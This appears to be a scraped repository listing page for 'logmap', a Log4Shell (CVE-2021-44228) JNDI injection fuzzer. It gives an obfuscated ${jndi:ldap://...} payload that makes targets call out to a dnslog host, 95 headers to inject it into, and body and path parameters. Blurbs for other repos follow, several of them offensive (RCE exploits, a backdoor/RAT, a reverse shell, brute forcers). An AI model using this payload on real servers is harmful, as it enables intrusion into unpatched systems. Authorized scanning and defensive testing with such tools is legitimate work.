logmap: Log4j2 jndi injection fuzz tool

Related tags

Security related resourcesinjectionfuzz-testingjndilog4j2cve-2021-44228log4shell
Overview

logmap - Log4j2 jndi injection fuzz tool

Used for fuzzing to test whether there are log4j2 jndi injection vulnerabilities in header/body/path
Use https://log.xn--9tr.com dnslog by default, If you want to use http://ceye.io, you need to modify the domain and token
Manually edit line #373 in logmap.py to modify:
args.ceye = ["xxxxxx.ceye.io", "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"]
to
args.ceye = ["1234567.ceye.io", "843fd6d58a8ebede756a2b991d321a5a"]

The default payload is ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//DNS_LOG_DOMAIN/a} You can customize at will, in line #283

This is just a jndi injection fuzz tool, rce or others need yourself

Use

[email protected]:~/$ pip3 install -r requirements.txt
[email protected]:~/$ python3 logmap.py -h

banner

Options

  -u URL, --url URL     Target URL (e.g. http://example.com )
  -f FILE, --file FILE  Select a target list file (e.g. list.txt )
  -d 1, --dns 1         Dnslog [1:log.xn--9tr.com, 2:ceye.io] default 1
  -p PAYLOAD            Custom payload (e.g. ${jndi:ldap://xx.dns.xx/} )
  -t 10                 Http timeout default 10s
  --proxy PROXY         Proxy [socks5/socks4/http] (e.g. http://127.0.0.1:8080)
  -h, --help            Show this help message and exit

Config

There are currently 95 fuzz headers

Accept-Charset
Accept-Datetime
Accept-Encoding
Accept-Language
Ali-CDN-Real-IP
Authorization
Cache-Control
Cdn-Real-Ip
Cdn-Src-Ip
CF-Connecting-IP
Client-IP
Contact
Cookie
DNT
Fastly-Client-Ip
Forwarded-For-Ip
Forwarded-For
Forwarded
Forwarded-Proto
From
If-Modified-Since
Max-Forwards
Originating-Ip
Origin
Pragma
Proxy-Client-IP
Proxy
Referer
TE
True-Client-Ip
True-Client-IP
Upgrade
User-Agent
Via
Warning
WL-Proxy-Client-IP
X-Api-Version
X-Att-Deviceid
X-ATT-DeviceId
X-Client-IP
X-Client-Ip
X-Client-IP
X-Cluster-Client-IP
X-Correlation-ID
X-Csrf-Token
X-CSRFToken
X-Do-Not-Track
X-Foo-Bar
X-Foo
X-Forwarded-By
X-Forwarded-For-Original
X-Forwarded-For
X-Forwarded-Host
X-Forwarded
X-Forwarded-Port
X-Forwarded-Protocol
X-Forwarded-Proto
X-Forwarded-Scheme
X-Forwarded-Server
X-Forwarded-Ssl
X-Forwarder-For
X-Forward-For
X-Forward-Proto
X-Frame-Options
X-From
X-Geoip-Country
X-Host
X-Http-Destinationurl
X-Http-Host-Override
X-Http-Method-Override
X-HTTP-Method-Override
X-Http-Method
X-Http-Path-Override
X-Https
X-Htx-Agent
X-Hub-Signature
X-If-Unmodified-Since
X-Imbo-Test-Config
X-Insight
X-Ip
X-Ip-Trail
X-Leakix
X-Original-URL
X-Originating-IP
X-ProxyUser-Ip
X-Real-Ip
X-Remote-Addr
X-Remote-IP
X-Requested-With
X-Request-ID
X-True-IP
X-UIDH
X-Wap-Profile
X-WAP-Profile
X-XSRF-TOKEN

Some body and path
You can also modify him to add your own body

payload={}
user={}
pass={}
username={}
password={}
login={}
... ...
?id={}
?username={}
... ...
Owner
之乎者也
天苍苍,野茫茫,风吹的我就像头羊~ @0-sec && @pwnwiki-project && @xiecat
之乎者也
GitHub Repository https://github.com/zhzyker/logmap
Python APK Reverser & Patcher Tool

DTL-X An Advanced Python APK Reverser and Patcher Tool. --rmads1: target=AndroidManifest.xml,replace=com.google.android.gms.ad --rmads2: No Internet (

DedSecTL 10 Oct 31, 2022
Fuck - Multi Brute Force 🚶‍♂

f-mbf Fuck - Multi Brute Force 🚶‍♂ Install Script $ pkg update && pkg upgrade $ pkg install python2 $ pkg install git $ pip2 install requests $ pip2

Yumasaa 1 Dec 03, 2021
Operational information regarding the vulnerability in the Log4j logging library.

Log4j Vulnerability (CVE-2021-44228) This repo contains operational information regarding the vulnerability in the Log4j logging library (CVE-2021-442

Nationaal Cyber Security Centrum (NCSC-NL) 1.9k Dec 26, 2022
CVE-2021-45232-RCE-多线程批量漏洞检测

CVE-2021-45232-RCE CVE-2021-45232-RCE-多线程批量漏洞检测 FOFA 查询 title="Apache APISIX Das

孤桜懶契 36 Sep 21, 2022
Proof of concept for CVE-2021-24086, a NULL dereference in tcpip.sys triggered remotely.

CVE-2021-24086 This is a proof of concept for CVE-2021-24086 ("Windows TCP/IP Denial of Service Vulnerability "), a NULL dereference in tcpip.sys patc

Axel Souchet 220 Dec 14, 2022
Exploiting CVE-2021-44228 in vCenter for remote code execution and more

Log4jCenter Exploiting CVE-2021-44228 in vCenter for remote code execution and more. Blog post detailing exploitation linked below: COMING SOON Why? P

81 Dec 20, 2022
Simulating Log4j Remote Code Execution (RCE) vulnerability in a flask web server using python's logging library with custom formatter that simulates lookup substitution by executing remote exploit code.

py4jshell Simulating Log4j Remote Code Execution (RCE) CVE-2021-44228 vulnerability in a flask web server using python's logging library with custom f

Narasimha Prasanna HN 86 Aug 21, 2022
This project is all about building an amazing application that will help users manage their passwords and even generate new passwords for them

An amazing application that will help us manage our passwords and even generate new passwords for us.

1 Jan 23, 2022
A python script to bypass 403-forbidden.

4nought3 A python script to bypass 403-forbidden. It covers methods like Host-Header Injections, Changing HTTP Requests Methods and URL-Injections. Us

11 Aug 27, 2022
Wordlist attacks on Bitwarden data.json files

BitwardenDecryptBrute This is a slightly modified version of BitwardenDecrypt. In addition to the decryption this version can do wordlist attacks for

42 Nov 09, 2022
Safe Policy Optimization with Local Features

Safe Policy Optimization with Local Feature (SPO-LF) This is the source-code for implementing the algorithms in the paper "Safe Policy Optimization wi

Akifumi Wachi 6 Jun 05, 2022
Backdoor is a term that refers to the access of the software or hardware of a computer system without being detected.

This program is an non-object oriented opensource, hidden and undetectable backdoor/reverse shell/RAT for Windows made in Python 3 which contains many features such as multi-client support and cross-

35 Apr 17, 2022
Cryptick is a stock ticker for cryptocurrency tokens, and a physical NFT.

Cryptick is a stock ticker for cryptocurrency tokens, and a physical NFT. This repository includes tools and documentation for the Cryptick device.

1 Dec 31, 2021
A decompilation of the Nintendo Switch version of Captain Toad: Treasure Tracker

cttt-decomp A decompilation of the Nintendo Switch version of Captain Toad: Trea

shibbs 14 Aug 17, 2022
A traceroute tool that also displays IP information

infotr A traceroute tool that also displays IP information. This tool has only been tested on Linux. Quick Start First, install this tool from PyPI. p

K4YT3X 10 Oct 29, 2022
The disassembler parses evm bytecode from the command line or from a file.

EVM Bytecode Disassembler The disassembler parses evm bytecode from the command line or from a file. It does not matter whether the bytecode is prefix

alpharush 22 Dec 27, 2022
A honeypot for the Log4Shell vulnerability (CVE-2021-44228)

Log4Pot A honeypot for the Log4Shell vulnerability (CVE-2021-44228). License: GPLv3.0 Features Listen on various ports for Log4Shell exploitation. Det

Thomas Patzke 79 Dec 27, 2022
BETA: Layla - recon tool for bug bounty

WELCOME TO LAYLA Layla is a python script that automatically performs recon on a

Matheus Faria 68 Jan 04, 2023
Uma ferramenta de segurança da informação escrita em python3,capaz de dar acesso total ao computador de alguém!

shell-reverse Uma ferramenta de segurança da informação escrita em python3, capaz de dar acesso total ao computador de alguém! A cybersecurity tool wr

Marcus Vinícius Ribeiro Andrade 1 Nov 03, 2021
🐝 ℹ️ Honeybee extension for export to IES-VE gem file format

honeybee-ies Honeybee extension for export a HBJSON file to IES-VE GEM file format Installation pip install honeybee-ies QuickStart import pathlib fro

Ladybug Tools 4 Jul 12, 2022